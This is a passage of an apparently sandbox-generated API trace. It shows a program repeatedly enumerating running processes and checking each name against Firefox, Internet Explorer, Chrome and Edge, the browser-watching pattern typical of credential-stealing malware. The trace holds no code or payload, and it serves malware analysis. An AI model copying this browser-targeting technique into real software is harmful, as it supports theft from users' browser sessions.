lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0225.156] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0225.156] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0225.156] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0225.156] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0225.156] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0225.156] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0225.156] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0225.156] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0225.156] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0225.156] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0225.157] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0225.157] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0225.157] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0225.157] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0225.157] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0225.157] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0225.157] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0225.157] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0225.157] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0225.157] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0225.158] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0225.158] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0225.158] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0225.158] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0225.158] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0225.159] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0225.159] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0225.159] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0225.159] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0225.159] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0225.159] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0225.159] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0225.159] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0225.159] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0225.159] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0225.160] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0225.160] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0225.160] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0225.160] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0225.160] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0225.160] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0225.160] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0225.160] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0225.160] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0225.160] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0225.161] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0225.161] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0225.161] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0225.161] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0225.161] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0225.162] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0225.162] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0225.162] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0225.162] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0225.162] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0225.162] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0225.162] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0225.162] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0225.163] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0225.163] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0225.163] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0225.163] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0225.163] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0225.163] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0225.163] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0225.164] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0225.164] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0225.164] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0225.164] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0225.164] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0225.164] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0225.164] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0225.164] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0225.164] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0225.164] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0225.165] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0225.165] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0225.165] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0225.165] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0225.165] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0225.165] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0225.165] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0225.165] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0225.165] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0225.165] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0225.166] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0225.166] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0225.166] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0225.166] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0225.166] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0225.166] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0225.166] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0225.166] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0225.167] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0225.167] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0225.167] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0225.167] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0225.167] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0225.167] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0225.167] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0225.168] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0225.168] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0225.168] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0225.168] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0225.168] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0225.194] lstrcmpiA (lpString1="gtjtdfe", lpString2="firefox.exe") returned 1 [0225.194] lstrcmpiA (lpString1="gtjtdfe", lpString2="iexplore.exe") returned -1 [0225.194] lstrcmpiA (lpString1="gtjtdfe", lpString2="chrome.exe") returned 1 [0225.194] lstrcmpiA (lpString1="gtjtdfe", lpString2="microsoftedgecp.exe") returned -1 [0225.194] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0225.194] CloseHandle (hObject=0xd4) returned 1 [0225.194] Sleep (dwMilliseconds=0x3e8) [0226.204] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0226.208] Process32First (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0226.209] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0226.209] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0226.209] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0226.209] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0226.209] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0226.210] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0226.210] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0226.210] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0226.210] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0226.210] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0226.211] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0226.211] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0226.211] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0226.211] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0226.211] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0226.211] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0226.211] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0226.211] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0226.211] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0226.211] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0226.212] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0226.212] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0226.212] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0226.212] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0226.212] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0226.213] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0226.213] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0226.213] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0226.213] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0226.213] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0226.213] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0226.213] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0226.213] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0226.213] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0226.214] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0226.214] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0226.214] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0226.214] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0226.214] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0226.214] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0226.215] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0226.215] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0226.215] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0226.215] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0226.215] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0226.216] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0226.216] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0226.216] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0226.216] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0226.216] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0226.216] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0226.216] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0226.216] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0226.216] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0226.216] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0226.217] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0226.217] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0226.217] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0226.217] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0226.217] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0226.218] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0226.218] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0226.218] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0226.218] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0226.218] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0226.219] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0226.219] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0226.219] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0226.219] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0226.219] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0226.219] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0226.219] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0226.219] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0226.219] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0226.219] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0226.220] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0226.220] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0226.220] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0226.220] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0226.220] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0226.221] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0226.221] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0226.221] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0226.221] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0226.221] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0226.222] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0226.222] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0226.222] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0226.222] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0226.222] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, 